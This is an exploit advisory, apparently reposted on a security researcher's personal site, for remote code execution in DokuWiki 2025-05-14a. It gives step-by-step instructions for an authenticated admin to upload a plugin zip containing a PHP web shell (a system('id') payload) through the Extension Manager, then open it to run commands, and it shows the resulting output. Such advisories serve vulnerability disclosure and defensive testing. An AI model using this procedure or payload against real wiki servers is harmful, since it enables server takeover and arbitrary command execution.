Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

# Exploit Title: DokuWiki 2025-05-14a Remote Code Execution via File # Exploit Title: DokuWiki 2025-05-14a Remote Code Execution via File Upload Authenticated
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.dokuwiki.org/dokuwiki
# Software Link: hhttps://github.com/dokuwiki/dokuwiki/releases/download/release-2025-05-14a/dokuwiki-2025-05-14a.zip
# Version : 2025-05-14a
# Date : 06/10/2025


1. Log in with valid admin credentials.
2. Click Extension Manager > Manually Install
3. Upload hello.zip file inside hello.php
Inject Payload
<?php echo system('id'); ?>
4. Click Install
5. Navigate to: https://127.0.0.1/DokuWiki/lib/plugins/hello/hello.php
6. Verify Results
uid=1003(DokuWiki) gid=1004(DokuWiki) groups=1004(DokuWiki)
Social Media Share